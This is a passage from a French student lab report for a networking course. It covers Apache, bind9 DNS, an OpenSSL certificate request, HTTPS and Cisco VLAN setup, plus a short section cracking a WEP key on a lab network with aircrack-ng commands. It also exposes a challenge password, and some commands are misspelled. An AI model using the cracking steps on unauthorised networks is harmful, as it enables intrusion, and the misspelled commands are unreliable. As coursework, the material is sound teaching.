        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
    $TTL 259200&lt;br /&gt;
    @IN SOA dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (&lt;br /&gt;
         21112019      ; Version&lt;br /&gt;
         7200    ; Refresh (2h)&lt;br /&gt;
         3600    ; Retry (1h)&lt;br /&gt;
         1209600 ; Expire (14j)&lt;br /&gt;
         7200    ; Minimum TTL (2h)&lt;br /&gt;
     @    IN NS  dns.ima2a5-rex4ever.site.    &amp;lt;= nom du dns ima2a5&lt;br /&gt;
     @    IN NS  ns6.gandi.net.               &amp;lt;= nom du dns de gandi&lt;br /&gt;
     dns  IN A   193.48.57.163                &amp;lt;= ip du dns ima2a5&lt;br /&gt;
     www  IN A   193.48.57.163                &amp;lt;= ip du site web&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA-PSK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur =====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E304 !! E306&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Commutateur&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
